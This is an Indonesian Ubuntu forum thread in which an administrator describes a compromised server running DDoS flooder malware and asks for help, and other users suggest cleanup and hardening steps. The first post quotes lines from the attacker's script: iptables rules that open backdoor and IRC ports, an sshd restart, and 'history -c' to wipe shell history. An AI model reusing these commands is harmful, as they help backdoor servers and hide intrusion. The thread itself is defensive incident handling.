[HELP] Virus @ ubuntu server 10.04 LTS

Diskusi tentang Ubuntu Server baik webserver, database server, samba server dan service lainnya serta jaringan menggunakan Sistem Operasi Ubuntu.
User avatar
ErwinLin
Posts: 3
Joined: 05 Mar 2014, 15:23
Location: Indonesia

[HELP] Virus @ ubuntu server 10.04 LTS

Postby ErwinLin » 06 Mar 2014, 09:03

Halo rekan - rekan user & master - master linux ubuntu.

Ada yang ingin saya tanyakan mengenai hal - hal yang saya dan team saya alami di tempat saya bekerja kemarin.
Di tempat kami bekerja, kami memakai server Supermicro menggunakan OS Linux Ubuntu 10.04 LTS.
Beberapa hari yang lalu, dari salah satu server kami ada aplikasi yang menyebabkan traffic sangat tinggi di router sehingga menyebabkan router tersebut hang (CPU Usage 100%) sehingga jaringan di server kami terganggu.

Kami mencoba untuk mencari asal muasal aplikasi yang menyebabkan traffic tinggi tersebut dan pada saat menggunakan 'top' di OS, kami menemukan ada aplikasi bernama 'talk' yang menggunakan resource sampai 100% di server.
Kami coba melakukan kill & delete terhadap aplikasi tersebut dan semuanya kembali normal.
Beberapa hari kemudian ternyata di server lain ditemukan hal serupa yang mengakibatkan hang kembali pada router.
Hal ini terjadi beberapa kali dan nama aplikasi penyebabnya terkadang ganti menjadi 's'.
kami mencoba mencari root directory aplikasi tersebut dan menemukan berada di folder /etc/.kde
Pada folder ini, banyak sekali file - file dan script yang mencurigakan.
Saat kami coba copy ke laptop yang telah terinstall oleh antivirus 'Avira', file - file tersebut terdeteksi sebagai virus :

filename : f4, detection : LINUX/Flooder.YB
filename : j, detection : DDOS/Linux.Small.b
filename : s, detection : LINUX/Small.D
filename : idiot2, detection : LINUX/Small.D
filename : f, detection : LINUX/Raped.A
filename : x, detection : LINUX/Procfake
filename : idiot3, detection : LINUX/Flooder.YE
filename : stream, detection : LINUX/Flooder.YF
filename : vadim, detection : LINUX/Flooder.YH
filename : bong2, detection : LINUX/Small.E
filename : tty, detection : LINUX/Flooder.YG
filename : bang2, detection : LINUX/Flooder.Y
filename : idiot, detection : LINUX/Verned.1
filename : j2, detection : LINUX/Spoof.H
filename : sl, detection : LINUX.Flooder.YD

selain file2 tersebut, ada file - file lain yang tidak terdeteksi sebagai virus yang berisi script - script untuk setting dan menjalankan aplikasi tertentu menggunakan crontab.
Hal ini terjadi dengan rentang waktu yang bervariasi dan di server yang berbeda2 dari 1 hari sampai 1 minggu.

Saya tidak begitu mengerti secara mendetail mengenai script - script linux tersebut, tapi yang saya tangkap, mereka mencoba membuka sshd di beberapa port yang berbeda dan invite beberapa IP di internet untuk masuk, lalu ada banyak sekali IP proxy dan DNS di salah satu file di folder tersebut.

beberapa sample file - file tersebut bernama : mech.set, mech.session, lalu ada script yang isinya adalah sebagai berikut :
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;");
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("/sbin/iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("/sbin/iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 82 -j ACCEPT ;")
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 1986 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 6667 -j ACCEPT ;");
system("iptables -I OUTPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("iptables -I INPUT -d 0/0 -s 0/0 -p tcp --dport 81 -j ACCEPT ;");
system("/etc/init.d/iptables stop; cat /etc/ssh/sshd_config | grep Port ;");
system("/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT; /etc/init.d/sshd start ;");
system("history -c");

Apakah ada dari rekan - rekan yang pernah mengalami hal serupa dan benarkan itu adalah virus di OS linux ubuntu? Atau ada hacker yang masuk dan menyisipkan aplikasi2 dan script2 berbahaya tersebut ?

Terima kasih dan jika ada yang mempunyai info atau bisa membantu, mungkin bisa di share informasi lebih mendetailnya...
User avatar
q_p
Posts: 3109
Joined: 14 Oct 2012, 13:01
Contact:

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby q_p » 06 Mar 2014, 09:10

izin nyimak :)
User avatar
remote
Posts: 50
Joined: 05 Dec 2013, 23:28
Location: Jakarta,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby remote » 06 Mar 2014, 10:02

blom pernah mengalami tapi mungkin yang lain bisa membantu..
User avatar
oragon
Posts: 64
Joined: 23 Oct 2012, 15:04
Location: Nganjuk,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby oragon » 06 Mar 2014, 10:33

Jangan-Jangan itu ulah Hacker
User avatar
oragon
Posts: 64
Joined: 23 Oct 2012, 15:04
Location: Nganjuk,indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby oragon » 06 Mar 2014, 10:37

dari script yang ada di filenya kelihatannya itu semacam tulisan untuk memicu suatu command agar bisa merouting atau membuat sebuah port atau backdoor yang bisa dimasuki oleh orang dari luar ,menurut analisaku sih begitu
User avatar
ErwinLin
Posts: 3
Joined: 05 Mar 2014, 15:23
Location: Indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby ErwinLin » 06 Mar 2014, 10:41

oragon wrote:dari script yang ada di filenya kelihatannya itu semacam tulisan untuk memicu suatu command agar bisa merouting atau membuat sebuah port atau backdoor yang bisa dimasuki oleh orang dari luar ,menurut analisaku sih begitu


hmmm... iya sih waktu memang sempat port SSH di salah satu server dibuka ke Internet untuk keperluan remote tanpa menggunakan VPN dan lumayan lama, tapi setelah itu sudah ditutup kembali, tapi setelah ditutup tersebut, sepertinya file - file tersebut masih bisa berjalan dan menyebabkan hang, padahal port - port SSH tersebut sudah ditutup dari internet. btw, terima kasih atas masukkannya ya...

Apa ada rekan - rekan lainnya yang punya pendapat berbeda?

Terima kasih sebelumnya...
User avatar
cha_plux
Posts: 127
Joined: 23 Feb 2011, 07:55
Location: N.K.R.I
Contact:

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby cha_plux » 06 Mar 2014, 15:00

Ikut nyimak,
soalnya problem kayak gini agak jarang ditemui.
User avatar
nif
Posts: 2816
Joined: 31 Mar 2011, 07:48

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby nif » 06 Mar 2014, 19:13

sangat mungkin itu memang virus om.
Linux punya tingkat keamanan yang bagus, tapi bukan tidak mungkin terkena malware. Bisa jadi ikut tersusupi dari installasi aplikasi di luar server repository.
Linux kadang terasa sedikit 'ribet' dengan berbagai aturan penggunaan permission, install aplikasi harus terhubung langsung ke server repository, ada signature PubKey, dll, tapi itulah cara menjaga keamanannya agar tidak tersusupi malware :)

cmiiw
User avatar
ErwinLin
Posts: 3
Joined: 05 Mar 2014, 15:23
Location: Indonesia

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby ErwinLin » 17 Mar 2014, 11:57

nif wrote:sangat mungkin itu memang virus om.
Linux punya tingkat keamanan yang bagus, tapi bukan tidak mungkin terkena malware. Bisa jadi ikut tersusupi dari installasi aplikasi di luar server repository.
Linux kadang terasa sedikit 'ribet' dengan berbagai aturan penggunaan permission, install aplikasi harus terhubung langsung ke server repository, ada signature PubKey, dll, tapi itulah cara menjaga keamanannya agar tidak tersusupi malware :)

cmiiw


Sips2, makasih ya atas masukkan2-nya...

Memang agak ribet sih, kadang install aplikasi menggunakan package di luar repository itu harus googling dulu lama hehe... :D
User avatar
myitanium
Posts: 399
Joined: 14 Jul 2011, 14:56
Contact:

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby myitanium » 17 Mar 2014, 12:27

1. kalau bisa, matikan koneksinya dulu.
2. cek username, delete username dan group yang mencurigakan.
3. cek cron, delete file script yang tidak dikenali
4. cek /etc/rcS sampai rc5, ada perintah yang gak lazim, Bila ada delete.
5. cek file /etc/sudoers, username tidak terdaftar hapus saja
6. coba jalankan server kembali, cek ps ax, bila masih ada aplikasi aneh, coba telusuri dengan lsof
7. lalu install denyhost.
8. pastikan firewall hanya membuka untuk port tertentu ke koneksi tertentu

saya pernah ke-hack, untung gak sampai dalam dan merusak.
User avatar
myitanium
Posts: 399
Joined: 14 Jul 2011, 14:56
Contact:

Re: [HELP] Virus @ ubuntu server 10.04 LTS

Postby myitanium » 17 Mar 2014, 12:30

kalau mau aman, sebenarnya bisa buka port ssh tapi dengan metode port knocking. jadi semacam kunci kombinasi.
misal konek ke port 22, 24, 22. baru username itu diijinkan untuk ssh.
Script nya memang rumit dikit, tapi benar2 aman.

Ada juga metode honeypot yang hacker diarahkan ke port tertentu dan dijebak disana.

paling simple ya denyhost, gagal login 3x langsung diblok ip-address nya. pastikan jaringan internal tidak di-blok. :D

Return to “Ubuntu Server”

Who is online

Users browsing this forum: No registered users and 0 guests